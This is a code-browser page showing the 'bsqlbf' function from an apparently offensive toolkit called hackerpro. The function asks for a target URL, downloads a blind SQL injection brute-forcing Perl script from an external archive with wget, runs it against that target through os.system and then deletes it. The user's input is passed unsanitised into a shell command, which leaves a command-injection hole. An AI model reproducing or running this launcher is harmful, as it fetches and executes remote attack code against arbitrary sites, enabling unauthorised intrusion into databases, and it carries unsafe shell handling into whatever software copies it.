MCPcopy
hub / github.com/jaykali/hackerpro / bsqlbf

Function bsqlbf

hackerpro.py:308–314  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

306
307
308def bsqlbf():
309 clearScr()
310 print("This tool will only work on blind sql injection")
311 cbsq = raw_input("select target : ")
312 os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl")
313 os.system("perl bsqlbf.pl -url %s" % cbsq)
314 os.system("rm bsqlbf.pl")
315
316
317def atscan():

Callers 1

expFunction · 0.85

Calls 1

clearScrFunction · 0.85

Tested by

no test coverage detected